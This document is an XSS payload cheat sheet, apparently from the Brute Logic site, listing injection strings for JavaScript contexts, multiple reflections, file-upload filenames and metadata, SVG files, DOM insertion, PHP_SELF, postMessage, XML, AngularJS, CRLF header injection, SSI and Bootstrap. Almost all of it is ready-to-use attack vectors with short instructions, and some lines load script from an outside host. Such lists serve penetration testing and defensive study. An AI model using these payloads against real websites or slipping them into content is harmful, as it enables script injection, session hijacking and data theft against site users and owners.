XSS Advanced

Javascript Context – Code Injection in Logical Block

Use 1st or 2nd payloads when input lands in a script block, inside a string delimited value and
inside a single logical block like function or conditional (if, else, etc). If quote is escaped with
a backslash, use 3rd payload.

‘}alert(1);{‘
‘}alert(1)%0A{‘
\’}alert(1);{//

Javascript Context – Quoteless Code Injection

Use when there’s multi reflection in the same line of JS code. 1st payload works in simple JS
variables and 2nd one works in non-nested JS objects.

-alert(1)//\
-alert(1)}//\

Javascript Context – Placeholder Injection in Template Literal

Use when input lands inside backticks (“) delimited strings or in template engines.

${alert(1)}

Multi Reflection in HTML Context – Double Reflection (Single Input)

Use to take advantage of multiple reflections on same page.

‘onload=alert(1)><svg/1=’
‘>alert(1)</script><script/1=’
/alert(1)</script><script>/

Multi Reflection in HTML Context – Triple Reflection (Single Input)

Use to take advantage of multiple reflections on same page.

/alert(1)”>’onload=”/<svg/1=’
-alert(1)">'onload="<svg/1=’
/</script>’>alert(1)/<script/1=’

Multi Input Reflections (Double & Triple) in HTML Context

Use to take advantage of multiple input reflections on same page. Also useful in HPP (HTTP
Parameter Pollution) scenarios, where there are reflections for repeated parameters. 3rd
payload makes use of comma-separated reflections of the same parameter.

p=<svg/1=’&q=’onload=alert(1)>
p=<svg 1=’&q=’onload=’/&r=/alert(1)’>
q=<script/&q=/src=data:&q=alert(1)>

File Upload Injection – Filename

Use when uploaded filename is reflected somewhere in target page.

“><svg onload=alert(1)>.gif

File Upload Injection – Metadata

Use when metadata of uploaded file is reflected somewhere in target page. It uses
command-line exiftool (“$” is the terminal prompt) and any metadata field can be set.

$ exiftool -Artist='”><svg onload=alert(1)>’ xss.jpeg

File Upload Injection – SVG File

Use to create a stored XSS on target when uploading image files. Save content below as
“xss.svg”.

<svg xmlns=”http://www.w3.org/2000/svg” onload=”alert(1)”/>

DOM Insert Injection

Use to test for XSS when injection gets inserted into DOM as valid markup instead of being
reflected in source code. It works for cases where script tag and other vectors won’t work.

<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
<svg><svg onload=alert(1)>

DOM Insert Injection – Resource Request

Use when javascript code of the page inserts into page the results of a request to an URL
controlled by attacker (injection).

data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>

PHP_SELF Injection

Use when current URL is used by target’s underlying PHP code as an attribute value of an
HTML form, for example. Inject between php extension and start of query part (?) using a
leading slash (/).

https://brutelogic.com.br/xss.php/”><svg onload=alert(1)>?a=reader

Script Injection – No Closing Tag

Use when there’s a closing script tag (</script>) somewhere in the code after reflection.

<script src=data:,alert(1)>
<script src=//brutelogic.com.br/1.js>

Javascript postMessage() DOM Injection (with Iframe)

Use when there’s a “message” event listener like in “window.addEventListener(‘message’, …)”
in javascript code without a check for origin. Target must be able to be framed (X-Frame
Options header according to context). Save as HTML file (or using data:text/html) providing
TARGET_URL and INJECTION (a XSS vector or payload).

<iframe src=TARGET_URL onload=”frames[0].postMessage(‘INJECTION’,’*’)”>

XML-Based XSS

Use to inject XSS vector in a XML page (content types text/xml or application/xml).
Prepend a “–>” to payload if input lands in a comment section or “]]>” if input lands in a
“CDATA” section.

<x:script xmlns:x=”http://www.w3.org/1999/xhtml”>alert(1)</x:script>
<x:script xmlns:x=”http://www.w3.org/1999/xhtml” src=”//brutelogic.com.br/1.js”/>

AngularJS Injections (v1.6 and up)

Use when there’s an AngularJS library loaded in page, inside an HTML block with ng-app
directive (1st payload) or creating your own (2nd one).

{{$new.constructor(‘alert(1)’)()}}
<x ng-app>{{$new.constructor(‘alert(1)’)()}}

CRLF Injection

Use when application reflects input in one of response headers, allowing the injection of
Carriage Return (%0D) and Line Feed (%0A) characters. Vectors for Gecko and Webkit,
respectively.

%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0A%0D%0A%3Cscript
%3Ealert(1)%3C/script%3E
%0D%0ALocation:%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D
%0A%0D%0A%3Cscript%3Ealert(1)%3C/script%3E

Onscroll Universal XSS Vector

Use to XSS without user interaction when using onscroll event handler. It works with
address, blockquote, body, center, dir, div, dl, dt, form, li, menu, ol, p, pre, ul, and h1 to h6
HTML tags.

<p style=overflow:auto;font-size:999px onscroll=alert(1)>AAA<x/id=y></p>#y

XSS in SSI

Use when there’s a Server-Side Include (SSI) injection.

<<!–%23set var=”x” value=”svg onload=alert(1)”–><!–%23echo var=”x”–>>

Type Juggling

Use to pass an “if” condition matching a number in loose comparisons.

1<svg onload=alert(1)>
1″><svg onload=alert(1)>

SQLi Error-Based XSS

Use in endpoints where a SQL error message can be triggered (with a quote or backslash).

‘1<svg onload=alert(1)>
<svg onload=alert(1)>\

Bootstrap XSS Vector

Use when there’s a bootstrap library present on page. It also bypass Webkit Auditor, just
click anywhere in page to trigger. Any char of href value can be HTML encoded do bypass
filters.

<html data-toggle=tab href=”<img src=x onerror=alert(1)>”>

Browser Notification

Use as an alternative to alert, prompt and confirm popups. It requires user acceptance (1st
payload) but once user has authorized previously for that site, the 2nd one can be used.

Notification.requestPermission(x=>{new(Notification)(1)})
new(Notification)(1)